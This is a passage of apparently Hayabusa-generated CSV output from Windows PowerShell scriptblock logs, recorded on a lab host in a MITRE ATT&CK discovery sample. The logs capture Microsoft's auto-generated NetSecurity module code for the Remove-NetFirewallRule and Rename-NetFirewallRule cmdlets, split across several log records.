($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_met",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"hodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { 